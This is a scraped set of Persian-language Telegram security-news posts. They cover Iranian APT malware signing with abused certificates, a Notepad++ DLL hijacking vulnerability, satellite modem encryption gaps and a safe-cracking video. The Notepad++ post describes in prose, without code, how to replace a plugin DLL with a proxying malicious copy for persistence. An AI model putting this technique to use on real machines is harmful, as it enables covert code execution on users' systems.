هکرهای APT ایران از گواهینامههای SSL.com برای امضای بدافزار استفاده میکنند
گروههای سایبری ایران (Charming Kitten , Subtle Snail , UNC1549 و زیر شاخه های آنها )از تکنیکی استفاده میکنند که در آن با جعل یا سوءاستفاده از گواهیهای دیجیتال معتبر SSL/TLS ، بدافزارها و ابزارهای خود را امضا (Sign) میکنند.
### نکات کلیدی فنی و امنیتی
* هدف اصلی: هدف از امضای بدافزار با گواهی معتبر، فریب دادن سیستمعاملها (به خصوص ویندوز) و ابزارهای امنیتی (مانند EDRها و آنتیویروسها) است که اغلب برنامههای امضا شده را قابل اعتمادتر و کمتر مخرب تلقی میکنند. این امر به بدافزار اجازه میدهد تا راحتتر از فیلترهای امنیتی عبور کرده و در شبکه قربانی پایداری (Persistence) ایجاد کند.
* روشهای دستیابی به گواهیها:
* سرقت گواهی: نفوذ به زیرساختهای مراکز صدور گواهی (CA - Certificate Authority) مانند حادثه مشهور Comodo و DigiNotar در سالهای گذشته، که در آن هکرها توانستند گواهیهای جعلی برای دامنههای مهم جهانی (مثل گوگل، یاهو) صادر کنند.
* خرید گواهیهای مسروقه: خرید گواهیهای معتبر مسروقه از بازارهای زیرزمینی دارکنت.
* استفاده از گواهیهای منقضی/لغو شده: حتی برخی از گواهیهای لغو شده یا منقضی شده نیز ممکن است توسط ابزارهای امنیتی قدیمی نادیده گرفته شوند.
* تأثیر بر شناسایی: امضای معتبر باعث میشود بدافزار از لحاظ ظاهری شبیه یک نرمافزار قانونی و قانونی به نظر برسد، که این موضوع کار مهندسی معکوس و تحلیل بدافزار را برای تحلیلگران امنیتی سختتر میکند و شناسایی آن توسط سامانههای مبتنی بر امضا را مختل میسازد.
* ارتباط با APTها: این تکنیک به طور مکرر توسط گروههای APT ایرانی مشاهده شده است که نشاندهنده پیچیدگی و سطح بالای دانش فنی این بازیگران در دور زدن مکانیزمهای امنیتی پایه است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Notepad++آسیبپذیری DLL Hijacking در ++Notepad
یک آسیبپذیری جدید DLL Hijacking (تزریق کتابخانه پیوند پویا) که به تازگی در ++Notepad ، ویرایشگر محبوب کد منبع، کشف شده است، میتواند به مهاجمان اجازه دهد تا کد دلخواه را بر روی دیوایس قربانی اجرا کنند.
این نقص که با شناسه CVE-2025-56383 ثبت شده است، در نسخه 8.8.3 وجود دارد و به طور بالقوه تمامی نسخههای نصب شده این نرمافزار را تحت تأثیر قرار میدهد، که میلیونها کاربر را در معرض خطر قرار میدهد. این آسیبپذیری به یک مهاجم محلی (Local Attacker) این امکان را میدهد که با قرار دادن یک فایل DLL مخرب در مسیری که برنامه برای بارگذاری کتابخانههای مورد نیاز خود جستجو میکند، به اجرای کد دست یابد. این نوع حمله، اصالت (Integrity) برنامه را تضعیف میکند و میتواند برای تثبیت دسترسی (Establish Persistence) یا افزایش سطح دسترسی (Escalate Privileges) در یک سیستم آلوده به کار رود.
## انتشار اکسپلویت (PoC Exploit) و جزئیات فنی
۔ DLL Hijacking از نحوه جستجو و بارگذاری کتابخانههای مورد نیاز توسط برنامههای ویندوز بهرهبرداری میکند. اگر یک برنامه بدون تعیین مسیر کامل (Full Path) برای یک DLL جستجو کند، ممکن است در چندین دایرکتوری، بر اساس یک ترتیب از پیش تعریف شده ، به دنبال آن بگردد.
یک مهاجم میتواند یک DLL مخرب با همان نام کتابخانه قانونی را در دایرکتوریای قرار دهد که قبل از مکان واقعی کتابخانه توسط سیستم جستجو میشود. هنگامی که کاربر برنامه را راهاندازی میکند، DLL مخرب به جای کتابخانه اصلی بارگذاری و اجرا میشود.
در مورد ++Notepad ، این آسیبپذیری میتواند با هدف قرار دادن DLLهای مرتبط با پلاگینهای (Plugins) آن بهرهبرداری شود. بر اساس اثبات مفهوم (PoC) منتشر شده، مهاجم میتواند فایل یک پلاگین، مانند NppExport.dll که در مسیر
++Notepad\plugins\NppExport\ قرار دارد، را با یک DLL مخرب ساختهشده سفارشی (Custom-Crafted Malicious DLL) جایگزین کند.### تکنیک Proxying برای پنهانکاری
برای پنهان ماندن از دید کاربر و اطمینان از اینکه عملکرد برنامه به صورت عادی ادامه پیدا کند، مهاجم میتواند DLL اصلی را تغییر نام دهد (مثلاً به
original-NppExport.dll ) و سپس کاری کند که جایگزین مخرب، تمام فراخوانیهای تابع قانونی (Legitimate Function Calls) را به سمت DLL اصلی تغییر نام داده شده، ارجاع (Forward) دهد.این تکنیک که به عنوان Proxying یا واسطهگری شناخته میشود، باعث میشود رفتار برنامه برای کاربر بدون مشکل (Seamless) به نظر برسد، در حالی که بار دادهای مخرب (Malicious Payload) در پسزمینه در حال اجرا است.
اندازه فایل
NppExport.dll مخرب به طور قابل توجهی کوچکتر از original-NppExport.dll است که نشاندهنده وجود کد متفاوت در آن است.### اجرای فایل مخرب
پس از راهاندازی Notepad++.exe ، برنامه، DLL مخرب را بارگذاری میکند که منجر به اجرای کد مهاجم میشود.
## تثبیت دسترسی و راهکارهای مقابله
تهدید اصلی ناشی از این آسیبپذیری، اجرای کد محلی است. مهاجمی که پیشتر از طریق بدافزار، فیشینگ یا سایر روشها، دسترسی اولیه به سیستم را به دست آورده باشد، میتواند از این نقص برای تثبیت دسترسی استفاده کند.
با Hijack کردن یک DLL در برنامهای پرکاربرد مانند ++Notepad ، کد مهاجم هر بار که کاربر ویرایشگر را باز میکند اجرا خواهد شد و این امر بقا و ماندگاری بدافزار را پس از راهاندازی مجدد سیستم تضمین میکند.
اگرچه این در تست بر روی Notepad++ v8.8.3 نصب شده از طریق نصاب رسمی انجام شده است، اما مشکل زمینهای، اساساً به نحوه بارگذاری مؤلفههای برنامه مرتبط است، که نشان میدهد هر نسخه نصب شدهای میتواند آسیبپذیر باشد.
### در حال حاضر در این لحظه، هیچ پچ رسمی از سوی توسعهدهندگان ++Notepad برای رفع CVE-2025-56383 منتشر نشده است.
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Mr. SAM
ابهام:
دوستی برام نوشته :
جالبه رفتم دیدم گزارش NDV بروزرسانی نشده.
اکسپلویت مال 3 روز پیش هست.
نسخه خودم هنوز 8.8.3 هست با اینکه همیشه برام بروزرسانی میومد و رفتم دیدم توی سایت ++Notepad نسخه 8.8.5 وجود داره"
——
جدای از اینکه شما باید در مورد فرآیند گزارشدهی و انتشار اطلاعات امنیتی بدونید 👇
وضعیت واقعی اینه که : از اونجا که این آسیبپذیری از نوع متداول DLL Hijacking است، و نسخههای جدیدتر منتشر شدهاند، عموما انتظار میرود که در نسخههای بالاتر از 8.3.3 (مانند 8.8.5) این نقص رفع شده باشد. با این حال، تا زمان تأیید رسمی توسعهدهنده و بهروزرسانی NVD، نمیتوان با قاطعیت 100 درصد گفت. پس متوجه منظور بشید خودتون دیگه که چه مسائل دیگهای ممکنه پیش بیاد .
دوستی برام نوشته :
جالبه رفتم دیدم گزارش NDV بروزرسانی نشده.
اکسپلویت مال 3 روز پیش هست.
نسخه خودم هنوز 8.8.3 هست با اینکه همیشه برام بروزرسانی میومد و رفتم دیدم توی سایت ++Notepad نسخه 8.8.5 وجود داره"
——
جدای از اینکه شما باید در مورد فرآیند گزارشدهی و انتشار اطلاعات امنیتی بدونید 👇
وضعیت واقعی اینه که : از اونجا که این آسیبپذیری از نوع متداول DLL Hijacking است، و نسخههای جدیدتر منتشر شدهاند، عموما انتظار میرود که در نسخههای بالاتر از 8.3.3 (مانند 8.8.5) این نقص رفع شده باشد. با این حال، تا زمان تأیید رسمی توسعهدهنده و بهروزرسانی NVD، نمیتوان با قاطعیت 100 درصد گفت. پس متوجه منظور بشید خودتون دیگه که چه مسائل دیگهای ممکنه پیش بیاد .
❤1
تحقیقات جامع در مورد مودمهای ماهوارهای تجاری موجود در بازار نشان دهنده آسیبپذیریهای امنیتی زیادی در این تجهیزات است.
نکته : رمزگذاری در بسیاری از مودمهای ماهوارهای تجاری به طور پیشفرض غیرفعال است - و گاهی اوقات فعال کردن آن هزینه اضافی دارد. در نتیجه، بسیاری از کاربران هرگز رمزگذاری را فعال نمیکنند .
تحلیل جامع آسیبپذیریها و حملات امنیتی در مودمهای ماهوارهای (به زبان انگلیسی)👇
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Reset/Forget/Recovery Password
میگذارند و هکرها از آن به عنوان
Backdoor
استفاده میکنند .
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
A Basic Device That Cracks Hi-Tech Safes | Hacklab | WIRED
Safes are everywhere in America, securing everything from cash and guns to narcotics and sensitive personal documents—in both homes and workplaces. But with no drills or cutting tools, security researchers James Rowley and Mark Omo have developed two separate…
❤1